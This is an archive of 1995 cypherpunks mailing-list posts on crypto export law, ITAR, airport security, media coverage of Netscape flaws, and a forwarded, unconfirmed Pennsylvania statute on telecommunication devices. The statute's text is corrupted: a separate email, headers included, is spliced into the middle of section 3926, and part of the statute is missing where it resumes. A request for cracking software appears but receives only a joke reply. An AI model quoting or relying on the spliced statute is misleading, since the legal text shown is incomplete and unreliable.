I just arrived in Ottawa, Canada from Seattle, USA.  I had sort of 
thought through exactly what Tim just described.  I had a little 
notebook with me and was doing some calculations and design of a 
fractal compression algorithm.  I started to think about El-Gamal and 
decided to look at elliptical curve algorithms.  So, I pulled out my 
copy of Applied Crypto to look up some things and started writing 
things down. (BTW: I had Applied Crypto with me for recreational 
reading on the plane, I don't normally carry it everywhere I go.)

Anyway, i got to customs in Ottawa, and they asked me if I had 
anything to declare.  I immediately thought, "Should I tell them 
about the notebook?"  I decided against it.  How does export of 
intellectual property work?

The other question they asked me was "Do you have any eggs?"  I 
started giggling.  **SARCASM ON** I always carry an egg around in my 
inside coat pocket.  Who knows when you might need one, especially 
when in a foreign country. **SARCASM OFF**  I don't know, I guess the 
question just struck me as funny.

Brad Shantz
TRISource (formerly TriLogic) Windows Development Services




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@ATHENA.MIT.EDU>
Date: Fri, 13 Oct 95 13:39:59 PDT
To: zoetrope@infinet.com
Subject: Re: Netscape question transformed
In-Reply-To: <m0t3pvO-000K7RC@mail.infinet.com>
Message-ID: <199510132039.QAA01087@charon.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


>         Why would a compony like Netscape jeapordise themselves by
> even letting out a beta version so hackers have time to find bugs
> before the full version is released. Don't take me wrong I have only
> been on the net fer a little over a year and Love Netscape.  And If I
> knew what I was Doing I would love to help them.....

I don't think that this can jeopardize a company...  What would you
rather see?  A company makes a beta release for people to attempt to
break, fixes the bugs, and then releases a better product?  Or would
you rather see a company release a product, tell people it is secure,
and then get bitten by numerous holes in it?

From a PR perspective, it sounds much better to take the first tact.
Similarly, you will get a better product using the first method.
Using the second method, NOT beta-testing your product, has a greater
chance of jeopardizing a company.  At least if they put out a beta, if
the press calls, they can say "this is nor our final product -- we
wanted to let people give it a try and find problems, so that we can
fix them before we start shipping".

-derek

PS: I remember what it was like being 13 -- I remember feeling like I
knew more than everyone around me, my parents, my friends, my
teachers.  The only suggestion I have for you is to realize that no
matter how much you know, or how much you think you know, there is
always someone else who knows more than you do.  Wisdom is learning to
figure out who that person is and listen to what they have to say.

Good Luck!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Fri, 13 Oct 95 14:44:08 PDT
To: Vincent Cate <vince@offshore.com.ai>
Subject: Re: Anguilla Cypherpunks Meeting
In-Reply-To: <Pine.3.89.9510131128.A6667-0100000@offshore.com.ai>
Message-ID: <199510132142.RAA18581@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Vincent Cate writes:
>On Fri, 13 Oct 1995, Michael Froomkin wrote:
>> On Thu, 12 Oct 1995, Vincent Cate wrote:
>> > If while you are outside the USA you want to write some software that uses
>> > encryption and sell it worldwide, let me know.  I could put you up while
>> > you wrote it and my company could sell it for share of the selling price. 
>> > Let me know what you are thinking of and how long you think it would take.
>> 
>> Of course if you are a US person (citizen or green card holder) this is 
>> just as much a violation of the ITAR than if you did it from inside the US..
>.
>> 
>> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
>> Associate Professor of Law | 
>
>Yes, I am still a US citizen, so far. 
>
>The corporation I work for is a legal entity of Anguilla.  I would not
>personally be selling it, the corporation would.  Do you think that is ok? 

The violation is in the *export*, not the sale.  You're suggestion is
that the US person developing software outside the country evades ITAR.
Mr Froomkin suggests otherwise.  His credentials seem sounder, but I,
for one, would like to hear his reasoning.

If it's true that ITAR makes such behavior illegal, then ITAR not only
inhibits freedom of speech, it inhibits freedom of *thought*.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 13 Oct 95 16:34:53 PDT
To: cypherpunks@toad.com
Subject: Re: Anguilla Cypherpunks Meeting
Message-ID: <aca444bd1102100414dd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:41 PM 10/13/95, s1018954@aix2.uottawa.ca wrote:
>Really? I thought except for incomes taxes, US laws only apply in American
>territory as opposed to applying to American people wherever they are (as
>I heard Germany's does).

It depends on what is meant by "outside the country." The law forbidding
travel to Cuba, for example, is not enforced by U.S. cops outside the
country, but upon reentry to the U.S. Ditto for other laws, such as those
affecting aid and support of countries we don't like, and the laws about
trading with the enemy.

>What if you were a dual citizen (US/Canada in my case)?

For the purposes of crypto laws (and many other laws, truth be told),
Canada is treated as a smallish northern state in the U.S.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 13 Oct 95 16:59:07 PDT
To: cypherpunks@toad.com
Subject: Re: 90%
In-Reply-To: <m0t3aMe-000KBGC@mail.infinet.com>
Message-ID: <199510132358.QAA06931@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGDAHw.1t@sgi.sgi.com>, Michael James Gebis <m-gebis@students.uiuc.edu> writes:
> In uiuc.mlist.cypherpunks zoetrope writes:
>> Can I ask a question....are you guys into cryptology for the interesting
>> facts and knowledge or fer cracking unix codes and raising havoc?

> _I_ got into it for the chicks.  Upon reflection it seems that it may not
> have worked as well as I might have hoped. :)

Yeah, definitely for all those crypto-groupies.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 13 Oct 95 14:07:46 PDT
To: cypherpunks@toad.com
Subject: Re: what are these people selling????
Message-ID: <199510132105.RAA06805@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9510130722.AA03096@anon.penet.fi>, an116512@anon.penet.fi wrote:

> why is the cp meeting sponsored by sun?
> so we can hear a sales pitch on java?

Where are clueless idiots that post messages such as the one quoted above
comming from?
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMH7UnyoZzwIn1bdtAQGPDAF+IRhbPNJK0fo6PXTrKliTU7ITwkzPOD5L
agjzNaBIDukCFmtfz1ZZNyHCC8OTeq5r
=B+J8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Sat, 14 Oct 95 02:17:36 PDT
To: fletch@ain.bls.com (Mike Fletcher)
Subject: Re: Identity database, another attempt...
In-Reply-To: <9510131347.AA18300@outland>
Message-ID: <951013.170750.4L0.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, fletch@ain.bls.com writes:

>         Not really related to the deadbeat dads thing, but we
> got a notice that the US DOT has mandated that all air passengers
> must present a gov't issue photo ID with a name that matches that
> on your ticket.  In addition it says that passengers should:
>
>         * be prepared to answer questions about their bags.
>         * be prepared to open the trunk of their car.

Have you flown recently?  They now ask you this scripted question about
whether you have been approached by anyone you don't know since arriving
at the airport, and warn you not to accept anything from a stranger or
leave your carry-on baggage unattended until you board the plane.  The
ticket agent told me it was a "new FAA regulation".  I hadn't flown
anywhere for a few years.  Anyone know how long this has been happening?

>         Goodbye freedom, hello police state.

I wonder how long before I need a passport to cross a state line...

OBsecurity:  Both directions, I had to carry a PC-Bus servo controller
card.  It's not nice to x-ray an EPROM, so I had it hand-inspected.  I
wouldn't let them open the static bag without a strap.  Both times, the
guard gave it a casual glance and passed it through.  In San Antonio,
they x-rayed the box while I held the card.  This particular card
assembly is pretty large.  A dummied version would have a sizeable
hidden compartment.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMH7lbBvikii9febJAQFS6gQAhnHW0IVAepxlmQ8rt48RCciYVo2KVUyI
q0fI3jwYxTcRIlNeqrfsxHiWY9gqvb7OtO9K9S30Y319P+THFhdx6hY6i2n4CM9m
iUWzv+usUZzgnIxa2l2cpcviBIY8p2ggc/gad9lV3hooIgH1jAzHYpMXIzRuE6bw
Yh2AoVI/Wrc=
=RwHs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 13 Oct 95 14:16:59 PDT
To: cypherpunks@toad.com
Subject: CAT_sho
Message-ID: <199510132116.RAA26244@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Econom of Oct 14 ogles the catfight between Wintel
   and JavaNet to outclaw whineflesh.


   "Will your next computer be a tin can and a wire?"

      This week's fall in technology stocks was bad enough.
      But what if the Internet destroyed the personal-computer
      industry ...?

      Sun, Oracle and Netscape are spending tens of millions
      of dollars on a bet that the Internet can do a lot more
      than pass around e-mail and transmit data. They think it
      can also do much of the work of today's computers,
      holding not just information but software, from word
      processors and spreadsheets to games and entertainment
      programs. Most radically, they go on to argue that this
      could end the reign of the personal computer. Forget
      Windows 95; some people are starting to wonder if they
      need Microsoft at all.

      But those who predict that such machines will kill the
      PC are ignoring computing history, and glitch-prone real
      life. The PC beat the mainframe because users wanted the
      whole computer on their desktop, not in the basement.
      That makes Java terminals look like a step backwards: by
      putting program storage far away down a shared network,
      it makes it vulnerable to delays, congestion, and all
      the unpredictability of anything out of a user's
      control.


   CAT_sho  (10 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com (cYberpUnc)
Date: Fri, 13 Oct 95 14:38:46 PDT
To: cypherpunks@toad.com
Subject: thanx
Message-ID: <m0t3rk3-000K9HC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


        Thanks to everyone especially Bill Sommerfeild and Derek Atkins fer
helping me out.......






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zoetrope@infinet.com (cYberpUnc)
Date: Fri, 13 Oct 95 14:54:51 PDT
To: cypherpunks@toad.com
Subject: applications
Message-ID: <m0t3rzZ-000K7TC@mail.infinet.com>
MIME-Version: 1.0
Content-Type: text/plain


        I know this isnt what you guys generally talk about but I was curious.
Off the top of your head do you know of any sites where I can get kracking
apps for macs?  Any information would be greatly appreciated.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Fri, 13 Oct 95 14:53:41 PDT
To: cypherpunks@toad.com
Subject: Re: Cypherpunks "Exposed"
Message-ID: <199510132153.RAA16456@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain




>X-Authentication-Warning: teal.csn.net: Host localhost didn't use HELO protocol

?que?

>Attn Reporters and Writers!!
>
>who are the CYPHERPUNKS?

First, most of those on this list, rather easily discernible since most of
them make no attempt to conceal their views. Second, anyone who agrees
substantially that the universal deployment of strong cryptology tools will
increase individual freedom, and that this is desirable.

>what are they talking about?

Since you're subscribed to this list, you can easily find out.

>what have they done in the past?

See a few web pages or FTP archives. "L. Detweiler's" page has plenty of
links to other places, although there are a few things I'd like him to
clarify (see below).

>who are the "leaders"?

Tim May says there are none. LD repeatedly contends that May, and anyone else
who agrees with his statement, are either ignorant or deliberately lying. (By
virtue of this post, I'm sure I'm now on this list.) Neal Stephenson's *The
Diamond Age* description of "CryptNet" is remarkably similar to this whole
situation. I wonder if Neal used any aspects of the LD "phenomenon" as a
template. (Aside: If you haven't yet read Diamond Age, do so immediately. My
highest possible rating.)

>what do they believe in?

See above. But individuals always differ.

>what are their *real* goals?

Why don't you join the guild, get your barcode tattoo and find out?

>My name is L.Detweiler, and I've made a serious study of the more ulterior
>aspects of the CYPHERPUNKS for several years,

Ulterior? I'd say it's right out in the open. The statists want the state to
have power over the individual. Most people on this list believe this would
be bad. Both are pretty well "represented" by a number of outspoken, public
individuals. It's reassuring to see the number of computer industry pros and
average folks alike who don't buy into the claim that freedom can be
preserved by outlawing it... or the equally likely claim that freedom itself
is bad, and people who advocate it are evil, right up there with violent
criminals (but see how many people who make these statements also advocate
"might makes right" rule of force by the creation and enforcement of coercive
laws, and the mass robbery of as many people as possible?). Best that these
people be as open and outspoken as those they disagree with, the better to
know their methods and goals.

>and I invite you to peruse my findings at the web site below.

I have, and I quote therefrom further below.

>I've been quoted in various articles and I'm available for serious interviews
>with anyone who wants the REAL STORY BEHIND THE CYPHERPUNKS.

Now that's blatant advertising. Where were you when all these so-called
"journalists" descended on the net, desperately searching for people who
would tell them the Internet was a festering pool of child molesting, money
laundering slime? Will we soon see you defending organizations like FinCEN?

>note: be forewarned that key cypherpunks consider me a heretical
>blasphemer because of the tenacious, unforgiving honesty and
>zealous antisychophancy by which I have pursued this herculean study.

Perhaps if you were less pompous and self-aggrandizing in your presentation,
people would be more willing to seriously entertain your ideas. Anyway, for
those who wish to browse

http://www.csn.net/~ldetweil

go ahead, and make up your own mind. Your page doesn't have a mailto:
button, Lance. But I figured this was perfectly appropriate for public
consumption anyway:

>Other Sites

>   Psychopunkery
[...]
>          + Raph Levien's remailer page - amazing how long it took to get
>            this simple and basic utility from the cypherpunk crowd --
>            and surprise! written by an outsider

The rest I'll let pass, but why is Raph an "outsider"? And what is "inside"?
Does agreeing with the above statements I've generalized make one "inside"?


-- 
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
                 To be a skeptic is to refuse to be a victim.
       "This is my .sig. There are many like it, but this one is mine."
                            Freedom...yeah, right.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Fri, 13 Oct 95 01:05:30 PDT
To: perry@piermont.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510130518.BAA22989@jekyll.piermont.com>
Message-ID: <199510130700.AA39159@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>> >It was suprisingly weak for a John Markoff story (he usually gets the
>> >details exactly right) but it is an issue that had to be brought up
>> >and I see no reason to call it a bad article overall.
>> 
>> *snort* I've been trying to keep my views to myself on this but claiming
>> Markoff usually gets things right is plain misleading. His articles are as
>> about as one sided as you can get and full of factual inaccuracies. The
>> Mitnik series were a farce and his latest work is reactionary fluff and
>> shows his true lack of understanding of his topics.
>
>He's as close as you are going to get to meeting the journalistic ideal.
>I'm willing to settle for someone who gets the job right nearly all of
>the time.

God help us all.

I am probably biased against the media in general, relying on them to present
a balanced and unbiased by the reporter, editor or media ownership is a tall
task for them. They are too quick to jump into the sensationalist angle and
disregard the overall view and truth.

For cypherpunks to get the proper facts and implications (subjective I guess)
into print, it's usually the case that any communication with the press has
to be very clear, concise, unambiguous and to the point. If you give them any
chance to wander off the rails they will take it and distort your words
according to their agenda. Once that happens it's usually the case the
article is scoffed at for a week or so and then forgotten until it's dragged
up later as someones point for whatever they want to support in their
discussion.

If there are good articles out there then it's usually the case the reporter
actually went and took the time to investigate their subject matter and
gather all points of view and to verify as many facts as they can. You say
Markoff does this, I dont agree he does. Then the editor has to keep their
big red pen out of it enought so the message isn't distorted. This doesnt
occur often IMHO. You're better off purchasing space in the paper yourself
and getting it said your way.

It's because of this dilema that a lot of the people I communicate with, and
who have the information people should know, choose to avoid and shun any
media contact. They dont want to be linked with some lame ass report.

Cheers,
Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 13 Oct 95 15:26:39 PDT
To: cypherpunks@toad.com
Subject: early anonymous remailer
Message-ID: <9510132205.AA00756@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


I was talking with someone at NSA's NISSC today and he was
talking about Hamilton's support of the gov't in the Whiskey Rebellion.
To voice his support (an unpopular position at the time) he wrote
an article under a pseudonym, had it published in a French paper and
then re-published over here, citing the French paper.

This is the earliest example of an anonymous remailer I've found yet. :-)



 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Fri, 13 Oct 95 01:31:06 PDT
To: raph@CS.Berkeley.EDU (Raph Levien)
Subject: Re: The Economist on Netscape "hackers"
In-Reply-To: <199510130458.VAA16480@kiwi.cs.berkeley.edu>
Message-ID: <199510130705.AA35603@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


I was going to ignore this, but I feel verbose today..

>I write the letter to the editor, or does someone else want to? One
>thing I'll need is a brief outline of Damien Doligez's acheivements to
>support the idea that characterizing him as a "hacker" is not quite
>right.

Hacker good. Cracker bad. Media distort hacker to bad. Media hype merchants.
Media bad. Bad ol' Media. Degauss. Reformat.

>Raph (who's wondering if there's something inherent in the media
>process that keeps them from getting their stories straight)

Reporters. Editors. Owners.

Cheers,
Mark
mark@locahrd.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eli Brandt <eli@UX3.SP.CS.CMU.EDU>
Date: Fri, 13 Oct 95 15:08:15 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Internet Flaws
In-Reply-To: <199510121638.MAA20833@jekyll.piermont.com>
Message-ID: <9510132208.AA13555@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry said:
> I am frequently informed before people redistribute, but not always,
> I'm afraid.

After somebody started advertising a car repair place through my
remailer, I found that most people don't seem to read the headers,
or their MUA hides that icky stuff from them.  I'd guess that
reporters will frequently fall into this group.  You might have
better luck if you moved the notice back to your sig.

--
   Eli Brandt
   eli+@cs.cmu.edu



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Fri, 13 Oct 95 01:31:01 PDT
To: cypherpunks@toad.com
Subject: Re: what are these people selling????
In-Reply-To: <9510130722.AA03096@anon.penet.fi>
Message-ID: <199510130708.AA36406@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>why is the cp meeting sponsored by sun?
>so we can hear a sales pitch on java?

Shucks, mebbe coz good ol Sun developed the lil ol java language? Ya think?

Werd.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Edwards <tedwards@access.digex.net>
Date: Fri, 13 Oct 95 15:26:57 PDT
To: cypherpunks@toad.com
Subject: New PA law (????)
Message-ID: <Pine.SUN.3.91.951013182341.10684B-100000@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



[Can anyone provide more information on this?  I am still looking for the 
original source to confirm/deny this.  Please pay special attention to 
anti-anon-mailer deals]

 ---------- Forwarded message ----------
This law was just passed and signed by the governor in PA.  If you look at it,
you'll notice that it makes it illegal to post instructions for making certain
things (like phreaking boxes) and it also makes it illegal to use an anonymous
remailer (conceal or assist another to conceal from any service provider).


   Amending Title 18 (Crimes and Offenses) of the Pennsylvania
   Consolidated Statutes, further providing for manufacture, distribution
   or possession of devices for theft of telecommunications services.
   
   The General Assembly of the Commonwealth of Pennsylvania hereby enacts
   as follows:
   
   Section 1. Sections 910 and 3926 of Title 18 of the Pennsylvania
   Consolidated Statutes are amended to read:
   
    910. Manufacture, distribution or possession of devices for theft of
   telecommunications services.
   
   (a) Offense defined.Any person commits an offense if he:
   
   (1) [makes or possesses any instrument, apparatus, equipment or]
   makes, distributes, possesses, uses or assembles an unlawful
   telecommunication device or modifies, alters, programs or reprograms a
   telecommunication device designed, adapted or which can be used:
   
   (i) for commission of a theft of [telecommunications]telecommunication
   service or to acquire or facilitate the acquisition of
   telecommunication service without the consent of the telecommunication
   service provider; or
   
   (ii) to conceal or to assist another to conceal from any [supplier of
   telecommunications] telecommunicationservice provider or from any
   lawful authority the existence or place of origin or of destination of
   any telecommunication; or
   
   (2) sells, possesses, distributes, gives or otherwise transfers to
   another[,] or offers, promotes or advertises for sale [any instrument,
   apparatus, equipment or device described in paragraph (1) of this
   subsection,] any:
   
   (i) unlawful telecommunication device, or plans or instructions for
   making or assembling the same, under circumstances evidencing an
   intent to use or employ such [instrument, apparatus, equipment or]
   unlawful telecommunication device, or to allow the same to be used or
   employed for a purpose described in paragraph (1) [of this
   subsection], or knowing or having reason to believe that the same is
   intended to be so used, or that the aforesaid plans or instructions
   are intended to be used for making or assembling such [instrument,
   apparatus, equipment or device.] unlawful telecommunication device; or
   
   
   (ii) material, including hardware, cables, tools, data, computer
   software or other information or equipment, knowing that the purchaser
   or a third person intends to use the material in the manufacture of an
   unlawful telecommunication device.
   
   (b) Grading.An offense under this section is a [misdemeanor of the
   first] felony of the third degree if the person convicted of such
   offense has been previously convicted of any similar crime in this or
   any other state or Federal jurisdiction. Otherwise it is a misdemeanor
   of the [second] first degree.
   
   (c) Restitution.The court may, in addition to any other sentence
   authorized by law, sentence a person convicted of violating this
   section to make restitution under section 1106 (relating to
   restitution for injuries to person or property) or 42 Pa.C.S. 
   9721(c) (relating to sentencing generally).
   
   (d) Civil action.A telecommunication service provider aggrieved by a
   violation of this section may, in a civil action in any court of
   competent jurisdiction, obtain appropriate relief, including
   preliminary and other equitable or declaratory relief, compensatory
   and punitive damages, reasonable investigation expenses, costs of suit
   and attorney fees.
   
   (e) Definitions.As used in this section, the following words and
   phrases shall have the meanings given to them in this subsection:
   
   "Manufacture of an unlawful telecommunication device." To produce or
   assemble an unlawful telecommunication device or to modify, alter,
   program or reprogram a telecommunication device to be capable of
   acquiring or facilitating the acquisition of telecommunication service
   without the consent of the telecommunication service provider.
   
   "Telecommunication device." Any type of instrument, device, machine or
   equipment which is capable of transmitting or receiving telephonic,
   electronic or radio communications, or any part of such instrument,
   device, machine or equipment, or any computer circuit, computer chip,
   electronic mechanism or other component which is capable of
   facilitating the transmission or reception of telephonic, electronic
   or radio communications.
   
   "Telecommunication service." The meaning given to it in section 3926
   (relating to theft of services).
   
   "Telecommunication service provider." The meanings given to it in
   section 3926 (relating to theft of service).
   
   "Unlawful telecommunication device." The meaning given to it in
   section 3926 (relating to theft of service).
   
    3926. Theft of services.
   
   (a) Acquisition of services.
   
   (1) A person is guilty of theft if he intentionally obtains services
   for himself or for another which he knows are available only for
   compensation, by deception or threat, by altering or tampering with
   the public utility meter or measuring device by which such services
   are delivered or by causing or permitting such altering or tampering,
   by making or maintaining any unauthorized connection, whether
   physically, electrically or inductively, to a distribution or
   transmission line, by attaching or maintaining the attachment of any
   unauthorized device to any cable, wire or other component of an
   electric, telephone or cable television system or to a television
   receiving set connected to a cable television system, by making or
   maintaining any unauthorized modification or alteration to any device
   installed by a cable television system, or by false token or other
   trick or artifice to avoid payment for the service.
   
   (1.1) A person is guilty of theft if he intentionally obtains or
   attempts to obtain telecommunication service by the use of an unlawful
   telecommunication device or without the consent of the
   telecommunication service provider.
   
   [(2) As used in this section, the word "service" includes, but is not
   limited to, labor, professional service, transportation service, the
   supplying of hotel accommodations, restaurant services, entertainment,
   cable television service, the supplying of equipment for use, and the
   supplying of commodities of a public utility nature such as gas,
   electricity, steam and water, and telephone service. The term
   "unauthorized" means that payment of full compensation for service has
   been avoided, or has been sought to be avoided, without the consent of
   the supplier of the service.]
   
   (3) A person is not guilty of theft of cable television service under
   this section who subscribes to and receives service through an
   authorized connection of a From owner-cypherpunks  Fri Oct 13 15:22:25 1995
Return-Path: <owner-cypherpunks>
Received: by toad.com id AA13987; Fri, 13 Oct 95 15:22:25 PDT
Received: from ix9.ix.netcom.com by toad.com id AA13971; Fri, 13 Oct 95 15:22:11 PDT
Received: from ix-pl4-18.ix.netcom.com by ix9.ix.netcom.com (8.6.12/SMI-4.1/Netcom)
	id PAA06683; Fri, 13 Oct 1995 15:21:53 -0700
Message-Id: <199510132221.PAA06683@ix9.ix.netcom.com>
X-Sender: stewarts@popd.ix.netcom.com
X-Mailer: Windows Eudora Light Version 1.5.2
Mime-Version: 1.0
Content-Type: text/plain; charset.s-ascii"
Date: Fri, 13 Oct 1995 15:21:00 -0700
To: zoetrope@infinet.com (cYberpUnc)
From: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: applications
Cc: cypherpunks@toad.com
Sender: owner-cypherpunks@toad.com
Precedence: bulk

At 05:50 PM 10/13/95 -0400, you wrote:
>        I know this isnt what you guys generally talk about but I was curious.
>Off the top of your head do you know of any sites where I can get kracking
>apps for macs?  Any information would be greatly appreciated.

There are several fine tool companies on the Web who can sell you large hammers.
Check with Yahoo for locations.
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---


 the same person or several
   persons, may be aggregated in determining the grade of the offense.
   
   (d) Inferences.
   
   (1) Any person having possession of or access to the location of a
   public utility meter or service measuring device which has been
   avoided or tampered with so as to inhibit or prevent the accurate
   measurement of utility service and who enjoys the use of or receives
   the benefit from the public utility service intended to be metered or
   measured by the public utility meter or measuring device so avoided or
   tampered with may be reasonably inferred to have acted to avoid or
   tamper with the public utility meter or measuring device with the
   intent to obtain the public utility service without making full
   compensation therefor.
   
   (2) Any person having possession of or access to the location of the
   distribution or transmission lines or other facilities of a cable
   television system which have been tapped, altered or tampered with or
   to which any unauthorized connection has been made or to which any
   unauthorized device has been attached or any person having possession
   of or access to any device installed by a cable television system to
   which an unauthorized modification or alteration has been made, the
   result of which tapping, altering, tampering, connection, attachment
   or modification is to avoid payment for all or any part of the cable
   television service for which payment is normally required, and who
   enjoys the use of or receives the benefit from the cable television
   service, may be reasonably inferred to have acted to have tapped,
   altered, tampered with, connected or attached to or modified cable
   television facilities with the intent to obtain cable television
   service without making full compensation therefor. This inference
   shall not apply to the act of a subscriber to cable television
   service, who receives service through an authorized connection of a
   television receiving set at his dwelling, in making, within his
   dwelling, an unauthorized connection of an additional television
   receiving set or sets or audio system which receives only basic cable
   television service obtained through such authorized connection.
   
   (e) Sale or transfer of device or plan intended for acquisition or
   diversion.A person is guilty of a misdemeanor of the third degree if
   he sells, gives or otherwise transfers to others or offers, advertises
   or exposes for sale to others, any device, kit, plan or other
   instructional procedure for the making of such device or a printed
   circuit, under circumstances indicating his having knowledge or reason
   to believe that such device, kit, plan or instructional procedure is
   intended for use by such others for the acquisition or diversion of
   services as set forth in subsections (a) and (b).
   
   (f) Restitution.The court may, in addition to any other sentence
   authorized by law, sentence a person convicted of violating this
   section to make restitution under section 1106 (relating to
   restitution for injuries to person or property) or 42 Pa.C.S. 
   9721(c) (relating to sentencing generally).
   
   (g) Civil action.A telecommunication service provider aggrieved by a
   violation of this section may, in a civil action in any court of
   competent jurisdiction, obtain appropriate relief, including
   preliminary and other equitable or declaratory relief, compensatory
   and punitive damages, reasonable investigation expenses, costs of suit
   and attorney fees.
   
   (h) Definitions.As used in this section, the following words and
   phrases shall have the meanings given to them in this subsection:
   
   "Service." Includes, but is not limited to, labor, professional
   service, transportation service, the supplying of hotel
   accommodations, restaurant services, entertainment, cable television
   service, the supplying of equipment for use, and the supplying of
   commodities of a public utility nature such as gas, electricity, steam
   and water, and telephone or telecommunication service. The term
   "unauthorized" means that payment of full compensation for service has
   been avoided, or has been sought to be avoided, without the consent of
   the supplier of the service.
   
   "Telephone service" or "telecommunication service." Includes, but is
   not limited to, any service provided for a charge or compensation to
   facilitate the origination, transmission, emission or reception of
   signs, signals, data, writings, images and sounds or intelligence of
   any nature by telephone, including cellular telephones, wire, radio,
   electromagnetic, photoelectronic or photooptical system.
   
   "Telecommunication service provider." A person or entity providing
   telecommunication service, including, but not limited to, a cellular,
   paging or other wireless communications company or other person or
   entity which, for a fee, supplies the facility, cell site, mobile
   telephone switching office or other equipment or telecommunication
   service.
   
   "Unlawful telecommunication device." Any electronic serial number,
   mobile identification number, personal identification number or any
   telecommunication device that is capable, or has been altered,
   modified, programmed or reprogrammed alone or in conjunction with
   another access device or other equipment so as to be capable, of
   acquiring or facilitating the acquisition of a telecommunication
   service without the consent of the telecommunication service provider.
   The term includes, but is not limited to, phones altered to obtain
   service without the consent of the telecommunication service provider,
   tumbler phones, counterfeit or clone phones, tumbler microchips,
   counterfeit or clone microchips, scanning receivers of wireless
   telecommunication service of a telecommunication service provider and
   other instruments capable of disguising their identity or location or
   of gaining access to a communications system operated by a
   telecommunication service provider.
   
   Section 2. This act shall take effect in 60 days.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 13 Oct 95 18:19:27 PDT
To: cypherpunks@toad.com
Subject: Re: what are these people selling????
Message-ID: <aca45d8413021004e721@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:43 PM 10/13/95, Censored Girls Anonymous wrote:

>I mean maybe we could get Microhard to do a meeting.
>Or the dreaded RSA or somebody.

Jim Bidzos, President of RSADSI, attended our special "Clipper" meeting the
weekend after Clipper was announced, in April 1993.

I'm not saying this in defense of RSADSI and their patent situation, just
